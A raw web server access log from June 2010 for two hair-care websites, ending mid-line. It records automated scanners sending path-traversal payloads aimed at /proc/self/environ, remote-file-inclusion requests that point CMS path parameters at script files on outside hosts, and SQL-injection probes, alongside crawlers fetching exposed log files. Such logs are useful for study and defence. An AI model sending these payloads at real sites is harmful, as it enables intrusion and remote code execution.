219.255.132.83 - - [14/Jun/2010:09:43:38 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:43:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:43:39 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:43:56 -0700] "GET /logs/access_100301.log//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:44:31 -0700] "GET /logs/access.log//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.37.176 - - [14/Jun/2010:09:44:33 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:44:34 -0700] "GET /logs/ HTTP/1.0" 200 5927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:45:43 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 2228224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:45:48 -0700] "GET /logs/access_091019.log HTTP/1.0" 200 561992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:45:49 -0700] "GET /logs/access_100308.log HTTP/1.0" 200 2199574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:45:49 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 2509489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:45:59 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:46:04 -0700] "GET /logs/access_100215.log HTTP/1.0" 200 3655063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:46:05 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:46:09 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 3581898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:46:40 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:46:57 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
61.97.159.28 - - [14/Jun/2010:09:48:20 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 200 5949 "-" "Mozilla/5.0" "growlonghairfast.com"
61.97.159.28 - - [14/Jun/2010:09:48:20 -0700] "GET /logs/access_100412.log///?_SERVER[DOCUMENT_ROOT]=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.97.159.28 - - [14/Jun/2010:09:48:20 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:09:48:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:48:32 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:48:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:48:32 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:49:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:09:49:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:52:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:53:21 -0700] "GET /logs/access_100412.log HTTP/1.0" 200 2139776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:53:50 -0700] "GET /logs/access_091207.log HTTP/1.0" 200 748461 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:09:54:12 -0700] "GET /logs/access_100301.log HTTP/1.0" 200 2120251 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:09:54:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
64.59.70.30 - - [14/Jun/2010:09:55:09 -0700] "GET /logs/access_100412.log/administrator/index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.59.70.30 - - [14/Jun/2010:09:55:09 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.59.70.30 - - [14/Jun/2010:09:55:09 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:09:56:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
67.195.37.176 - - [14/Jun/2010:09:56:53 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.30.129.57 - - [14/Jun/2010:09:58:06 -0700] "GET /logs/access_100412.log/administrator/index2.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
67.30.129.57 - - [14/Jun/2010:09:58:06 -0700] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
67.30.129.57 - - [14/Jun/2010:09:58:06 -0700] "GET /administrator/index2.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:09:58:06 -0700] "GET /logs/access_100322.log//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:09:58:06 -0700] "GET /index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:09:58:07 -0700] "GET /logs//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:09:58:29 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:58:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:58:29 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:59:48 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:59:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:09:59:49 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:00:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:10:01:03 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:10:01:03 -0700] "GET /logs/access_100412.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:10:01:03 -0700] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [14/Jun/2010:10:01:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13056 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
220.181.94.229 - - [14/Jun/2010:10:01:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11099 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
220.181.94.229 - - [14/Jun/2010:10:02:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:03:12 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:03:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:03:13 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:10:03:34 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:04:35 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:04:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:04:35 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:23 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:23 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
213.75.77.56 - - [14/Jun/2010:10:05:54 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
66.249.65.244 - - [14/Jun/2010:10:06:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:06:36 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:06:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
213.75.77.56 - - [14/Jun/2010:10:06:37 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.94.249.37 - - [14/Jun/2010:10:08:24 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:10:09:03 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [14/Jun/2010:10:09:07 -0700] "GET /logs/access.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [14/Jun/2010:10:09:07 -0700] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [14/Jun/2010:10:10:06 -0700] "GET /logs/access_100412.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:10:10:09 -0700] "GET /logs/access.log HTTP/1.0" 200 515767 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:12:22 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:10:12:22 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:10:12:22 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:10:12:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:12:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:12:49 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [14/Jun/2010:10:13:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
64.118.87.45 - - [14/Jun/2010:10:16:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:16:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:16:49 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:16:57 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:16:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.118.87.45 - - [14/Jun/2010:10:17:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:10:24:51 -0700] "GET /logs/access_100412.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:10:24:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:10:25:58 -0700] "GET /logs/access_100125.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [14/Jun/2010:10:29:26 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.236.47.182 - - [14/Jun/2010:10:29:26 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.236.47.182 - - [14/Jun/2010:10:29:30 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.77.218.154 - - [14/Jun/2010:10:34:24 -0700] "GET /view_event.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.205.2.110 - - [14/Jun/2010:10:34:43 -0700] "GET /view_event.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
66.249.65.250 - - [14/Jun/2010:10:36:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
188.40.137.140 - - [14/Jun/2010:10:37:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:37:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:37:07 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:37:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:37:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:37:34 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:44:37 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [14/Jun/2010:10:44:48 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt??